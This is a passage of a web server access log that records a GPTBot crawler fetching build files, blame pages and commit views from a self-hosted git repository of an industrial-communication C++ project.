"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11011] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13495] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:16:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" -[17/Feb/2026:16:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11619] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17966] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70933] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15181] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13706] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10627] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:16:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" -[17/Feb/2026:16:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" -[17/Feb/2026:16:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16418] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:16:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10560] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:16:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10560] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:16:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10538] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:16:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10562] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:16:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/index.html" -[17/Feb/2026:16:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10200] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10427] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11039] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr 